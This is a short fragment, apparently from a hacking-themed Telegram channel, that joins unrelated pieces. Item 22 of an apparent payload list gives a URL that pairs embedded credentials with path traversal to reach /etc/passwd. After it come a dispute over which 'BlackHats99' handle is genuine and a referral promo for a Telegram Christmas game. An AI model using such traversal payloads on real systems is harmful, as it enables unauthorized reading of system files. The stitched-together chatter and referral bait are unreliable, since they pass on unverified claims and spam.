22. Combination of userinfo and traversal:
- https://admin:password@google.com/../../etc/passwd
BLACKHATS99 OG id : @BlackzHere
@BLACKHATS99 is a scam id and someone else has claimed the username. So don't message on that
Check out this Christmas game on Telegram 🎄
If you join, we both get gifts! Then you can decide if you wanna keep playing or not :)
Here’s the link 👇👇👇
